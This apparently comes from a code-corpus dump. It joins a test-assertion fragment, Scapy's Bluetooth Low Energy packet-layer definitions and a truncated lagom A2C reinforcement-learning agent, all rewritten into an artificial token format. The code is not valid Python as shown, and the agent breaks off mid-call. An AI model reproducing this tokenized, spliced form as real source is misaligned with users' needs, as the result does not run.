dag.tasks[3].__class__.__name__)<line_sep>self.assertEqual("CrossTenantDependencySensor" dag.tasks[4].__class__.__name__)<block_end><block_end> |
# This file is for use with Scapy
# See http://www.secdev.org/projects/scapy for more information
# Copyright (C) Airbus DS CyberSecurity
# Authors: <NAME>, <NAME>, <NAME>
# This program is published under a GPLv2 license
"""Bluetooth 4LE layer"""<import_stmt>struct<import_from_stmt>scapy.modules.six.moves range<import_from_stmt>scapy.compat orb chb<import_from_stmt>scapy.config conf<import_from_stmt>scapy.data DLT_BLUETOOTH_LE_LL DLT_BLUETOOTH_LE_LL_WITH_PHDR DLT_NORDIC_BLE PPI_BTLE<import_from_stmt>scapy.fields BitEnumField BitField ByteEnumField ByteField Field FlagsField LEIntField LEShortEnumField LEShortField StrFixedLenField MACField PacketListField SignedByteField LEX3BytesField XBitField XByteField XShortField XLEIntField XLEShortField<import_from_stmt>scapy.layers.bluetooth EIR_Hdr L2CAP_Hdr<import_from_stmt>scapy.layers.ppi PPI_Element PPI_Hdr<import_from_stmt>scapy.packet Packet bind_layers<import_from_stmt>scapy.utils mac2str str2mac<line_sep>####################
# Transport Layers #
####################
<class_stmt>BTLE_PPI(PPI_Element)<block_start>"""Cooked BTLE PPI header
See ``ppi_btle_t`` in
https://github.com/greatscottgadgets/libbtbb/blob/master/lib/src/pcap.c
"""<line_sep>name="BTLE PPI header"<line_sep>fields_desc=[ByteField("btle_version" 0) # btle_channel is a frequency in MHz. Named for consistency with
# other users.
LEShortField("btle_channel" <none>) ByteField("btle_clkn_high" <none>) LEIntField("btle_clk_100ns" <none>) SignedByteField("rssi_max" <none>) SignedByteField("rssi_min" <none>) SignedByteField("rssi_avg" <none>) ByteField("rssi_count" <none>)]<block_end><class_stmt>BTLE_RF(Packet)<block_start>"""Cooked BTLE link-layer pseudoheader.
http://www.whiterocker.com/bt/LINKTYPE_BLUETOOTH_LE_LL_WITH_PHDR.html
"""<line_sep>name="BTLE RF info header"<line_sep>fields_desc=[ByteField("rf_channel" 0) SignedByteField("signal" -128) SignedByteField("noise" -128) ByteField("access_address_offenses" 0) XLEIntField("reference_access_address" 0) FlagsField("flags" 0 -16 ["dewhitened" "sig_power_valid" "noise_power_valid" "decrypted" "reference_access_address_valid" "access_address_offenses_valid" "channel_aliased" "res1" "res2" "res3" "crc_checked" "crc_valid" "mic_checked" "mic_valid" "res4" "res5"])]<block_end><class_stmt>NORDIC_BLE(Packet)<block_start>"""Cooked Nordic BTLE link-layer pseudoheader.
"""<line_sep>name="BTLE Nordic info header"<line_sep>fields_desc=[ByteField("board" 0) LEShortField("payload_len" <none>) ByteField("protocol" 0) LEShortField("packet_counter" 0) ByteField("packet_id" 0) ByteField("packet_len" 10) ByteField("flags" 0) ByteField("channel" 0) ByteField("rssi" 0) LEShortField("event_counter" 0) LEIntField("delta_time" 0) ]<def_stmt>post_build self p pay<block_start><if_stmt>self.payload_len<is><none><block_start>p=p[:1]+chb(len(pay)+10)+p[2:]<block_end><return>p+pay<block_end><block_end>##########
# Fields #
##########
<class_stmt>BDAddrField(MACField)<block_start><def_stmt>__init__ self name default resolve=<false><block_start>MACField.__init__(self name default)<if_stmt>resolve<block_start>conf.resolve.add(self)<block_end><block_end><def_stmt>i2m self pkt x<block_start><if_stmt>x<is><none><block_start><return>b"\0\0\0\0\0\0"<block_end><return>mac2str(':'.join(x.split(':')[::-1]))<block_end><def_stmt>m2i self pkt x<block_start><return>str2mac(x[::-1])<block_end><block_end><class_stmt>BTLEChanMapField(XByteField)<block_start><def_stmt>__init__ self name default<block_start>Field.__init__(self name default "<Q")<block_end><def_stmt>addfield self pkt s val<block_start><return>s+struct.pack(self.fmt self.i2m(pkt val))[:5]<block_end><def_stmt>getfield self pkt s<block_start><return>s[5:] self.m2i(pkt struct.unpack(self.fmt s[:5]+b"\x00\x00\x00")[0])<block_end><block_end># noqa: E501
##########
# Layers #
##########
<class_stmt>BTLE(Packet)<block_start>name="BT4LE"<line_sep>fields_desc=[XLEIntField("access_addr" 0x8E89BED6) LEX3BytesField("crc" <none>)]<line_sep>@staticmethod<def_stmt>compute_crc pdu init=0x555555<block_start><def_stmt>swapbits a<block_start>v=0<if_stmt>a&0x80<ne>0<block_start>v<augor>0x01<block_end><if_stmt>a&0x40<ne>0<block_start>v<augor>0x02<block_end><if_stmt>a&0x20<ne>0<block_start>v<augor>0x04<block_end><if_stmt>a&0x10<ne>0<block_start>v<augor>0x08<block_end><if_stmt>a&0x08<ne>0<block_start>v<augor>0x10<block_end><if_stmt>a&0x04<ne>0<block_start>v<augor>0x20<block_end><if_stmt>a&0x02<ne>0<block_start>v<augor>0x40<block_end><if_stmt>a&0x01<ne>0<block_start>v<augor>0x80<block_end><return>v<block_end>state=swapbits(init&0xff)+(swapbits((init<rshift>8)&0xff)<lshift>8)+(swapbits((init<rshift>16)&0xff)<lshift>16)<line_sep># noqa: E501
lfsr_mask=0x5a6000<for_stmt>i (orb(x)<for>x pdu)<block_start><for_stmt>j range(8)<block_start>next_bit=(state^i)&1<line_sep>i<augrshift>1<line_sep>state<augrshift>1<if_stmt>next_bit<block_start>state<augor>1<lshift>23<line_sep>state<augxor>lfsr_mask<block_end><block_end><block_end><return>struct.pack("<L" state)[:-1]<block_end><def_stmt>post_build self p pay# Switch payload and CRC
<block_start>crc=p[-3:]<line_sep>p=p[:-3]+pay<line_sep>p<augadd>crc<if>self.crc<is><not><none><else>self.compute_crc(p[4:])<line_sep><return>p<block_end><def_stmt>post_dissect self s<block_start>self.raw_packet_cache=<none># Reset packet to allow post_build
<return>s<block_end><def_stmt>pre_dissect self s# move crc
<block_start><return>s[:4]+s[-3:]+s[4:-3]<block_end><def_stmt>hashret self<block_start><return>struct.pack("!L" self.access_addr)<block_end><block_end><class_stmt>BTLE_ADV(Packet)<block_start>name="BTLE advertising header"<line_sep>fields_desc=[BitEnumField("RxAdd" 0 1 {0:"public" 1:"random"}) BitEnumField("TxAdd" 0 1 {0:"public" 1:"random"}) BitField("RFU" 0 2) # Unused
BitEnumField("PDU_type" 0 4 {0:"ADV_IND" 1:"ADV_DIRECT_IND" 2:"ADV_NONCONN_IND" 3:"SCAN_REQ" # noqa: E501
4:"SCAN_RSP" 5:"CONNECT_REQ" 6:"ADV_SCAN_IND"}) # noqa: E501
BitField("unused" 0 2) # Unused
XBitField("Length" <none> 6) ]<def_stmt>post_build self p pay<block_start>p<augadd>pay<if_stmt>self.Length<is><none><block_start><if_stmt>len(pay)<g>2<block_start>l_pay=len(pay)<block_end><else_stmt><block_start>l_pay=0<block_end>p=p[:1]+chb(l_pay&0x3f)+p[2:]<block_end><if_stmt><not>isinstance(self.underlayer BTLE)<block_start>self.add_underlayer(BTLE)<block_end><return>p<block_end><block_end><class_stmt>BTLE_DATA(Packet)<block_start>name="BTLE data header"<line_sep>fields_desc=[BitField("RFU" 0 3) # Unused
BitField("MD" 0 1) BitField("SN" 0 1) BitField("NESN" 0 1) BitEnumField("LLID" 0 2 {1:"continue" 2:"start" 3:"control"}) ByteField("len" <none>) # BLE 4.2 and upwards can use 1 entire byte for length
]<def_stmt>post_build self p pay<block_start><if_stmt>self.len<is><none><block_start>p=p[:-1]+chb(len(pay))<block_end><return>p+pay<block_end><def_stmt>do_dissect_payload self s<block_start><if_stmt>s<is><not><none><block_start>cls=self.guess_payload_class(s)<try_stmt><block_start>p=cls(s _internal=1 _underlayer=self)<block_end><except_stmt>KeyboardInterrupt<block_start><raise><block_end><except_stmt>Exception<block_start><if_stmt>conf.debug_dissector<block_start><if_stmt>issubtype(cls Packet)<block_start>log_runtime.error("%s dissector failed"%cls.__name__)<block_end><else_stmt><block_start>log_runtime.error("%s.guess_payload_class() returned [%s]"%(self.__class__.__name__ repr(cls)))<line_sep># noqa: E501
<block_end><if_stmt>cls<is><not><none><block_start><raise><block_end><block_end>p=conf.raw_layer(s _internal=1 _underlayer=self)<block_end>self.add_payload(p)<block_end><block_end><block_end><class_stmt>BTLE_EMPTY_PDU(Packet)<block_start>name="Empty data PDU"<block_end><class_stmt>BTLE_ADV_IND(Packet)<block_start>name="BTLE ADV_IND"<line_sep>fields_desc=[BDAddrField("AdvA" <none>) PacketListField("data" <none> EIR_Hdr)]<block_end><class_stmt>BTLE_ADV_DIRECT_IND(Packet)<block_start>name="BTLE ADV_DIRECT_IND"<line_sep>fields_desc=[BDAddrField("AdvA" <none>) BDAddrField("InitA" <none>)]<block_end><class_stmt>BTLE_ADV_NONCONN_IND(BTLE_ADV_IND)<block_start>name="BTLE ADV_NONCONN_IND"<block_end><class_stmt>BTLE_ADV_SCAN_IND(BTLE_ADV_IND)<block_start>name="BTLE ADV_SCAN_IND"<block_end><class_stmt>BTLE_SCAN_REQ(Packet)<block_start>name="BTLE scan request"<line_sep>fields_desc=[BDAddrField("ScanA" <none>) BDAddrField("AdvA" <none>)]<def_stmt>answers self other<block_start><return>BTLE_SCAN_RSP<in>other<and>self.AdvA<eq>other.AdvA<block_end><block_end><class_stmt>BTLE_SCAN_RSP(Packet)<block_start>name="BTLE scan response"<line_sep>fields_desc=[BDAddrField("AdvA" <none>) PacketListField("data" <none> EIR_Hdr)]<def_stmt>answers self other<block_start><return>BTLE_SCAN_REQ<in>other<and>self.AdvA<eq>other.AdvA<block_end><block_end><class_stmt>BTLE_CONNECT_REQ(Packet)<block_start>name="BTLE connect request"<line_sep>fields_desc=[BDAddrField("InitA" <none>) BDAddrField("AdvA" <none>) # LLDATA
XLEIntField("AA" 0x00) LEX3BytesField("crc_init" 0x0) XByteField("win_size" 0x0) XLEShortField("win_offset" 0x0) XLEShortField("interval" 0x0) XLEShortField("latency" 0x0) XLEShortField("timeout" 0x0) BTLEChanMapField("chM" 0) BitField("SCA" 0 3) BitField("hop" 0 5) ]<block_end>BTLE_Versions={6:'4.0' 7:'4.1' 8:'4.2' 9:'5.0' 10:'5.1' }<line_sep>BTLE_Versions_Supported_Opcode={'4.0':0x0B }<line_sep>BTLE_Corp_IDs={0xf:'Broadcom Corporation' 0x59:'Nordic Semiconductor ASA'}<line_sep>BTLE_CtrlPDU_optcode={0x00:'LL_CONNECTION_UPDATE_REQ' 0x01:'LL_CHANNEL_MAP_REQ' 0x02:'LL_TERMINATE_IND' 0x03:'LL_ENC_REQ' 0x04:'LL_ENC_RES' 0x05:'LL_START_ENC_REQ' 0x06:'LL_START_ENC_RES' 0x07:'LL_UNKNOWN_RSP' 0x08:'LL_FEATURE_REQ' 0x09:'LL_FEATURE_RSP' # OK
0x0A:'LL_PAUSE_ENC_REQ' 0x0B:'LL_PAUSE_ENC_RES' 0x0C:'LL_VERSION_IND' # OK
0x0D:'LL_REJECT_IND' 0x0E:'LL_SLAVE_FEATURE_REQ' 0x0F:'LL_CONNECTION_PARAM_REQ' 0x10:'LL_CONNECTION_PARAM_RES' 0x14:'LL_LENGTH_REQ' 0x15:'LL_LENGTH_RSP' }<class_stmt>CtrlPDU(Packet)<block_start>name="CtrlPDU"<line_sep>fields_desc=[ByteEnumField("optcode" 0 BTLE_CtrlPDU_optcode)]<def_stmt>do_dissect_payload self s<block_start><if_stmt>s<is><not><none><block_start>cls=self.guess_payload_class(s)<try_stmt><block_start>p=cls(s _internal=1 _underlayer=self)<block_end><except_stmt>KeyboardInterrupt<block_start><raise><block_end><except_stmt>Exception<block_start><if_stmt>conf.debug_dissector<block_start><if_stmt>issubtype(cls Packet)<block_start>log_runtime.error("%s dissector failed"%cls.__name__)<block_end><else_stmt><block_start>log_runtime.error("%s.guess_payload_class() returned [%s]"%(self.__class__.__name__ repr(cls)))<line_sep># noqa: E501
<block_end><if_stmt>cls<is><not><none><block_start><raise><block_end><block_end>p=conf.raw_layer(s _internal=1 _underlayer=self)<block_end>self.add_payload(p)<block_end><block_end><block_end><class_stmt>LL_CONNECTION_UPDATE_REQ(Packet)<block_start>name='LL_CONNECTION_UPDATE_REQ'<line_sep>fields_desc=[XByteField("win_size" 0x0) XLEShortField("win_offset" 0x0) XLEShortField("interval" 0x0) XLEShortField("latency" 0x0) XLEShortField("timeout" 0x0) XLEShortField("instant" 0x0) ]<block_end><class_stmt>LL_CHANNEL_MAP_REQ(Packet)<block_start>name='LL_CHANNEL_MAP_REQ'<line_sep>fields_desc=[BTLEChanMapField("chM" 0) XLEShortField("instant" 0x0) ]<block_end><class_stmt>LL_TERMINATE_IND(Packet)<block_start>name='LL_TERMINATE_IND'<line_sep>fields_desc=[XByteField("code" 0x0) ]<block_end><class_stmt>LL_ENC_REQ(Packet)<block_start>name='LL_ENC_REQ'<line_sep>fields_desc=[StrFixedLenField("rand" "" length=8) StrFixedLenField("ediv" "" length=2) StrFixedLenField("skdm" "" length=8) StrFixedLenField("ivm" "" length=4) ]<block_end><class_stmt>LL_ENC_RSP(Packet)<block_start>name='LL_ENC_RSP'<line_sep>fields_desc=[StrFixedLenField("skds" "" length=8) StrFixedLenField("ivs" "" length=4) ]<block_end><class_stmt>LL_PAUSE_ENC_REQ(Packet)<block_start>name='LL_PAUSE_ENC_REQ'<block_end><class_stmt>LL_PAUSE_ENC_RSP(Packet)<block_start>name='LL_PAUSE_ENC_RSP'<block_end><class_stmt>LL_START_ENC_REQ(Packet)<block_start>name='LL_START_ENC_REQ'<block_end><class_stmt>LL_START_ENC_RSP(Packet)<block_start>name='LL_START_ENC_RSP'<block_end><class_stmt>LL_UNKNOWN_RSP(Packet)<block_start>name='LL_UNKNOWN_RSP'<line_sep>fields_desc=[XByteField("code" 0x0) ]<block_end><class_stmt>LL_FEATURE_REQ(Packet)<block_start>name="LL_FEATURE_REQ"<line_sep>fields_desc=[FlagsField("feature_set" 0 -16 [# 4.0
'le_encryption' # 4.1
'conn_par_req_proc' 'ext_reject_ind' 'slave_init_feat_exch' # 4.2
'le_ping' 'le_data_len_ext' 'll_privacy' 'ext_scan_filter' # 5.0
'll_2m_phy' 'tx_mod_idx' 'rx_mod_idx' 'le_coded_phy' 'le_ext_adv' 'le_periodic_adv' 'ch_sel_alg' 'le_pwr_class']) BitField("reserved" 0 48) ]<block_end><class_stmt>LL_FEATURE_RSP(Packet)<block_start>name="LL_FEATURE_RSP"<line_sep>fields_desc=[FlagsField("feature_set" 0 -16 ['le_encryption' # 4.0
'conn_par_req_proc' 'ext_reject_ind' 'slave_init_feat_exch' 'le_ping' # 4.1
'le_data_len_ext' 'll_privacy' 'ext_scan_filter' # 4.2
'll_2m_phy' 'tx_mod_idx' 'rx_mod_idx' 'le_coded_phy' 'le_ext_adv' 'le_periodic_adv' 'ch_sel_alg' 'le_pwr_class']) BitField("min_used_channels" 0 1) BitField("reserved" 0 47) ]<block_end><class_stmt>LL_VERSION_IND(Packet)<block_start>name="LL_VERSION_IND"<line_sep>fields_desc=[ByteEnumField("version" 8 BTLE_Versions) LEShortEnumField("Company" 0 BTLE_Corp_IDs) XShortField("subversion" 0)]<block_end><class_stmt>LL_REJECT_IND(Packet)<block_start>name="LL_REJECT_IND"<line_sep>fields_desc=[XByteField("code" 0x0) ]<block_end><class_stmt>LL_SLAVE_FEATURE_REQ(Packet)<block_start>name="LL_SLAVE_FEATURE_REQ"<line_sep>fields_desc=[FlagsField("feature_set" 0 -16 ['le_encryption' # 4.0
'conn_par_req_proc' 'ext_reject_ind' 'slave_init_feat_exch' 'le_ping' # 4.1
'le_data_len_ext' 'll_privacy' 'ext_scan_filter' # 4.2
'll_2m_phy' 'tx_mod_idx' 'rx_mod_idx' 'le_coded_phy' 'le_ext_adv' 'le_periodic_adv' 'ch_sel_alg' 'le_pwr_class']) BitField("min_used_channels" 0 1) BitField("reserved" 0 47) ]<block_end><class_stmt>LL_LENGTH_REQ(Packet)<block_start>name=' LL_LENGTH_REQ'<line_sep>fields_desc=[XLEShortField("max_rx_bytes" 251) XLEShortField("max_rx_time" 2120) XLEShortField("max_tx_bytes" 251) XLEShortField("max_tx_time" 2120) ]<block_end><class_stmt>LL_LENGTH_RSP(Packet)<block_start>name=' LL_LENGTH_RSP'<line_sep>fields_desc=[XLEShortField("max_rx_bytes" 251) XLEShortField("max_rx_time" 2120) XLEShortField("max_tx_bytes" 251) XLEShortField("max_tx_time" 2120) ]<block_end># Advertisement (37-39) channel PDUs
bind_layers(BTLE BTLE_ADV access_addr=0x8E89BED6)<line_sep>bind_layers(BTLE BTLE_DATA)<line_sep>bind_layers(BTLE_ADV BTLE_ADV_IND PDU_type=0)<line_sep>bind_layers(BTLE_ADV BTLE_ADV_DIRECT_IND PDU_type=1)<line_sep>bind_layers(BTLE_ADV BTLE_ADV_NONCONN_IND PDU_type=2)<line_sep>bind_layers(BTLE_ADV BTLE_SCAN_REQ PDU_type=3)<line_sep>bind_layers(BTLE_ADV BTLE_SCAN_RSP PDU_type=4)<line_sep>bind_layers(BTLE_ADV BTLE_CONNECT_REQ PDU_type=5)<line_sep>bind_layers(BTLE_ADV BTLE_ADV_SCAN_IND PDU_type=6)<line_sep># Data channel (0-36) PDUs
# LLID=1 -> Continue
bind_layers(BTLE_DATA L2CAP_Hdr LLID=2)# BTLE_DATA / L2CAP_Hdr / ATT_Hdr
bind_layers(BTLE_DATA CtrlPDU LLID=3)# BTLE_DATA / CtrlPDU
bind_layers(BTLE_DATA BTLE_EMPTY_PDU len=0)# BTLE_DATA / CtrlPDU
bind_layers(CtrlPDU LL_CONNECTION_UPDATE_REQ optcode=0x00)# BTLE_DATA / CtrlPDU / LL_FEATURE_RSP
bind_layers(CtrlPDU LL_CHANNEL_MAP_REQ optcode=0x01)# BTLE_DATA / CtrlPDU / LL_FEATURE_RSP
bind_layers(CtrlPDU LL_TERMINATE_IND optcode=0x02)# BTLE_DATA / CtrlPDU / LL_TERMINATE_IND
bind_layers(CtrlPDU LL_ENC_REQ optcode=0x03)# BTLE_DATA / CtrlPDU / LL_ENC_REQ
bind_layers(CtrlPDU LL_ENC_RSP optcode=0x04)# BTLE_DATA / CtrlPDU / LL_ENC_RSP
bind_layers(CtrlPDU LL_START_ENC_REQ optcode=0x05)# BTLE_DATA / CtrlPDU / LL_START_ENC_REQ
bind_layers(CtrlPDU LL_START_ENC_RSP optcode=0x06)# BTLE_DATA / CtrlPDU / LL_START_ENC_RSP
bind_layers(CtrlPDU LL_UNKNOWN_RSP optcode=0x07)# BTLE_DATA / CtrlPDU / LL_UNKNOWN_RSP
bind_layers(CtrlPDU LL_FEATURE_REQ optcode=0x08)# BTLE_DATA / CtrlPDU / LL_FEATURE_REQ
bind_layers(CtrlPDU LL_FEATURE_RSP optcode=0x09)# BTLE_DATA / CtrlPDU / LL_FEATURE_RSP
bind_layers(CtrlPDU LL_VERSION_IND optcode=0x0C)# BTLE_DATA / CtrlPDU / LL_VERSION_IND
bind_layers(CtrlPDU LL_REJECT_IND optcode=0x0D)# BTLE_DATA / CtrlPDU / LL_SLAVE_FEATURE_REQ
bind_layers(CtrlPDU LL_SLAVE_FEATURE_REQ optcode=0x0E)# BTLE_DATA / CtrlPDU / LL_SLAVE_FEATURE_REQ
bind_layers(CtrlPDU LL_LENGTH_REQ optcode=0x14)# BTLE_DATA / CtrlPDU / LL_LENGTH_REQ
bind_layers(CtrlPDU LL_LENGTH_RSP optcode=0x15)# BTLE_DATA / CtrlPDU / LL_LENGTH_RSP
bind_layers(CtrlPDU LL_PAUSE_ENC_REQ optcode=0x0A)# BTLE_DATA / CtrlPDU / LL_LENGTH_RSP
bind_layers(CtrlPDU LL_PAUSE_ENC_RSP optcode=0x0B)# BTLE_DATA / CtrlPDU / LL_LENGTH_RSP
# TODO: more optcodes
conf.l2types.register(DLT_BLUETOOTH_LE_LL BTLE)<line_sep>conf.l2types.register(DLT_BLUETOOTH_LE_LL_WITH_PHDR BTLE_RF)<line_sep>conf.l2types.register(DLT_NORDIC_BLE NORDIC_BLE)<line_sep>bind_layers(BTLE_RF BTLE)<line_sep>bind_layers(NORDIC_BLE BTLE)<line_sep>bind_layers(PPI_Hdr BTLE_PPI pfh_type=PPI_BTLE)<line_sep> |
<import_stmt>numpy<as>np<import_stmt>torch<import_stmt>torch.optim<as>optim<import_stmt>torch.nn<as>nn<import_stmt>torch.nn.functional<as>F<import_from_stmt>torch.nn.utils clip_grad_norm_<import_from_stmt>lagom.networks BaseNetwork<import_from_stmt>lagom.networks make_fc<import_from_stmt>lagom.networks ortho_init<import_from_stmt>lagom.networks linear_lr_scheduler<import_from_stmt>lagom.policies BasePolicy<import_from_stmt>lagom.policies CategoricalHead<import_from_stmt>lagom.policies DiagGaussianHead<import_from_stmt>lagom.value_functions StateValueHead<import_from_stmt>lagom.transform ExplainedVariance<import_from_stmt>lagom.history.metrics final_state_from_segment<import_from_stmt>lagom.history.metrics terminal_state_from_segment<import_from_stmt>lagom.history.metrics bootstrapped_returns_from_segment<import_from_stmt>lagom.history.metrics gae_from_segment<import_from_stmt>lagom.agents BaseAgent<class_stmt>MLP(BaseNetwork)<block_start><def_stmt>make_params self config<block_start>self.feature_layers=make_fc(self.env_spec.observation_space.flat_dim config['network.hidden_sizes'])<line_sep>self.layer_norms=nn.ModuleList([nn.LayerNorm(hidden_size)<for>hidden_size config['network.hidden_sizes']])<block_end><def_stmt>init_params self config<block_start><for_stmt>layer self.feature_layers<block_start>ortho_init(layer nonlinearity='leaky_relu' constant_bias=0.0)<block_end><block_end><def_stmt>reset self config **kwargs<block_start><pass><block_end><def_stmt>forward self x<block_start><for_stmt>layer,layer_norm zip(self.feature_layers self.layer_norms)<block_start>x=layer_norm(F.celu(layer(x)))<block_end><return>x<block_end><block_end><class_stmt>Critic(BaseNetwork)<block_start><def_stmt>make_params self config<block_start>self.feature_layers=make_fc(self.env_spec.observation_space.flat_dim config['network.hidden_sizes'])<line_sep>self.layer_norms=nn.ModuleList([nn.LayerNorm(hidden_size)<for>hidden_size 
config['network.hidden_sizes']])<line_sep>self.output_layer=StateValueHead(config self.device config['network.hidden_sizes'][-1])<block_end><def_stmt>init_params self config<block_start><for_stmt>layer self.feature_layers<block_start>ortho_init(layer nonlinearity='leaky_relu' constant_bias=0.0)<block_end>self.make_optimizer(config)<block_end><def_stmt>make_optimizer self config **kwargs<block_start>self.optimizer=optim.Adam(self.parameters() lr=config['algo.lr_V'])<if_stmt>config['algo.use_lr_scheduler']<block_start><if_stmt>'train.iter'<in>config<block_start>self.lr_scheduler=linear_lr_scheduler(self.optimizer config['train.iter'] 'iteration-based')<block_end><elif_stmt>'train.timestep'<in>config<block_start>self.lr_scheduler=linear_lr_scheduler(self.optimizer config['train.timestep']+1 'timestep-based')<block_end><block_end><else_stmt><block_start>self.lr_scheduler=<none><block_end><block_end><def_stmt>optimizer_step self config **kwargs<block_start><if_stmt>config['agent.max_grad_norm']<is><not><none><block_start>clip_grad_norm_(self.parameters() config['agent.max_grad_norm'])<block_end><if_stmt>self.lr_scheduler<is><not><none><block_start><if_stmt>self.lr_scheduler.mode<eq>'iteration-based'<block_start>self.lr_scheduler.step()<block_end><elif_stmt>self.lr_scheduler.mode<eq>'timestep-based'<block_start>self.lr_scheduler.step(kwargs['total_T'])<block_end><block_end>self.optimizer.step()<block_end><def_stmt>reset self config **kwargs<block_start><pass><block_end><def_stmt>forward self x<block_start><for_stmt>layer,layer_norm zip(self.feature_layers self.layer_norms)<block_start>x=layer_norm(F.celu(layer(x)))<block_end>x=self.output_layer(x)<line_sep><return>x<block_end><block_end><class_stmt>Policy(BasePolicy)<block_start><def_stmt>make_networks self config<block_start>self.feature_network=MLP(config self.device 
env_spec=self.env_spec)<line_sep>feature_dim=config['network.hidden_sizes'][-1]<if_stmt>self.env_spec.control_type<eq>'Discrete'<block_start>self.action_head=CategoricalHead(config self.device feature_dim self.env_spec)<block_end><elif_stmt>self.env_spec.control_type<eq>'Continuous'<block_start>self.action_head=DiagGaussianHead(config self.device feature_dim self.env_spec min_std=config['agent.min_std'] std_style=config['agent.std_style'] constant_std=config['agent.constant_std'] std_state_dependent=config['agent.std_state_dependent'] init_std=config['agent.init_std'])<block_end><if_stmt><not>config['network.independent_V']<block_start>self.V_head=StateValueHead(config self.device feature_dim)<block_end><block_end><def_stmt>make_optimizer self config **kwargs<block_start>self.optimizer=optim.Adam(self.parameters() lr=config['algo.lr'])<if_stmt>config['algo.use_lr_scheduler']<block_start><if_stmt>'train.iter'<in>config<block_start>self.lr_scheduler=linear_lr_scheduler(self.optimizer config['train.iter'] 'iteration-based')<block_end><elif_stmt>'train.timestep'<in>config<block_start>self.lr_scheduler=linear_lr_scheduler(self.optimizer config['train.timestep']+1 'timestep-based')<block_end><block_end><else_stmt><block_start>self.lr_scheduler=<none><block_end><block_end><def_stmt>optimizer_step self config **kwargs<block_start><if_stmt>config['agent.max_grad_norm']<is><not><none><block_start>clip_grad_norm_(self.parameters() config['agent.max_grad_norm'])<block_end><if_stmt>self.lr_scheduler<is><not><none><block_start><if_stmt>self.lr_scheduler.mode<eq>'iteration-based'<block_start>self.lr_scheduler.step()<block_end><elif_stmt>self.lr_scheduler.mode<eq>'timestep-based'<block_start>self.lr_scheduler.step(kwargs['total_T'])<block_end><block_end>self.optimizer.step()<block_end>@property<def_stmt>recurrent self<block_start><return><false><block_end><def_stmt>reset self config **kwargs<block_start><pass><block_end><def_stmt>__call__ self x out_keys=['action' 'V'] info={} 
**kwargs<block_start>out={}<line_sep>features=self.feature_network(x)<line_sep>action_dist=self.action_head(features)<line_sep>action=action_dist.sample().detach()# TODO: detach is necessary or not ?
out['action']=action<if_stmt>'V'<in>out_keys<block_start>V=self.V_head(features)<line_sep>out['V']=V<block_end><if_stmt>'action_dist'<in>out_keys<block_start>out['action_dist']=action_dist<block_end><if_stmt>'action_logprob'<in>out_keys<block_start>out['action_logprob']=action_dist.log_prob(action)<block_end><if_stmt>'entropy'<in>out_keys<block_start>out['entropy']=action_dist.entropy()<block_end><if_stmt>'perplexity'<in>out_keys<block_start>out['perplexity']=action_dist.perplexity()<block_end><return>out<block_end><block_end><class_stmt>Agent(BaseAgent)<block_start>r"""Advantage Actor-Critic (A2C). """<def_stmt>make_modules self config<block_start>self.policy=Policy(config self.env_spec self.device)<if_stmt>config['network.independent_V']<block_start>self.critic=Critic(config self.device env_spec=self.env_spec)<block_end><block_end><def_stmt>prepare self config **kwargs<block_start>self.total_T=0<block_end><def_stmt>reset self config **kwargs<block_start><pass><block_end><def_stmt>choose_action self obs info={}<block_start>obs=torch.from_numpy(np.asarray(obs)).float().to(self.device)<if_stmt>self.training<block_start><if_stmt>self.config['network.independent_V']<block_start>out=self.policy(obs out_keys=['action' 'action_logprob' 'entropy'] info=info)<line_sep>out['V']=self.critic(obs)<block_end><else_stmt><block_start>out=self.policy(obs out_keys=['action' 'action_logprob' 'V' 'entropy'] info=info)<block_end><block_end><else_stmt><block_start><with_stmt>torch.no_grad()<block_start>out=self.policy(obs out_keys=['action'] info=info)<block_end><block_end># sanity check for NaN
<if_stmt>torch.any(torch.isnan(out['action']))<block_start><raise>ValueError('NaN!')<block_end><return>out<block_end><def_stmt>learn self D info={}<block_start>logprobs=torch.stack([info['action_logprob']<for>info D.batch_infos] 1).squeeze(-1)<line_sep>entropies=torch.stack([info['entropy']<for>info D.batch_infos] 1).squeeze(-1)<line_sep>all_Vs=torch.stack([info['V']<for>info D.batch_infos] 1).squeeze(-1)<line_sep>last_states=torch.from_numpy(final_state_from_segment(D)).float().to(self.device)<with_stmt>torch.no_grad()<block_start><if_stmt>self.config['network.independent_V']<block_start>last_Vs=self.critic(last_states)<block_end><else_stmt><block_start>last_Vs=self.policy(last_states out_keys=['V'])['V']<block_end><block_end>Qs=bootstrapped_returns_from_segment(D last_Vs self.config['algo.gamma'])<line_sep>Qs=torch.from_numpy(Qs.copy()).float().to(self.device)<if_stmt>self.config['agent.standardize_Q']<block_start>Qs=(Qs-Qs.mean(1 keepdim=<true>))/(Qs.std(1 keepdim=<true>)+1e-8)<block_end>As=gae_from_segment(D all_Vs last_Vs self.config['algo.gamma'] self.config['algo.gae_lambda'])<line_sep>As=torch.from_numpy(As.copy()).float().to(self.device)<if_stmt>self.config['agent.standardize_adv']<block_start>As=(As-As.mean(1 keepdim=<true>))/(As.std(1 keepdim=<true>)+1e-8)<block_end><assert_stmt>all([x.ndimension()<eq>2<for>x [logprobs entropies all_Vs Qs As]])<line_sep>policy_loss=-logprobs<times>As<line_sep>policy_loss=policy_loss.mean()<line_sep>entropy_loss=-entropies<line_sep>entropy_loss=entropy_loss.mean()<line_sep>value_loss=F.mse_loss(all_Vs Qs 
reduction='none')<line_sep>value_loss=value_loss.mean()<line_sep>entropy_coef=self.config['agent.entropy_coef']<line_sep>value_coef=self.config['agent.value_coef']<line_sep>loss=policy_loss+value_coef<times>value_loss+entropy_coef<times>entropy_loss<if_stmt>self.config['agent.fit_terminal_value']<block_start>terminal_states=terminal_state_from_segment(D)<if_stmt>terminal_states<is><not><none><block_start>terminal_states=torch.from_numpy(terminal_states).float().to(self.device)<line_sep>terminal_Vs=self.policy(terminal_states out_keys=['V'])['V']<line_sep>terminal_value_loss=F.mse_loss(terminal_Vs torch.zeros_like(terminal_Vs))<line_sep>terminal_value_loss_coef=self.config['agent.terminal_value_coef']<line_sep>loss<augadd>terminal_value_loss_coef<times>terminal_value_loss<block_end><block_end>self.policy.optimizer.zero_grad()<if_stmt>self.config['network.independent_V']<block_start>self.critic.optimizer.zero_grad()<block_end>loss.backward()<line_sep>self.policy.optimizer_step(self.config total_T=self.total_T)<if_stmt>self.config['network.independent_V']<block_start>self.critic.optimizer_step(self.config 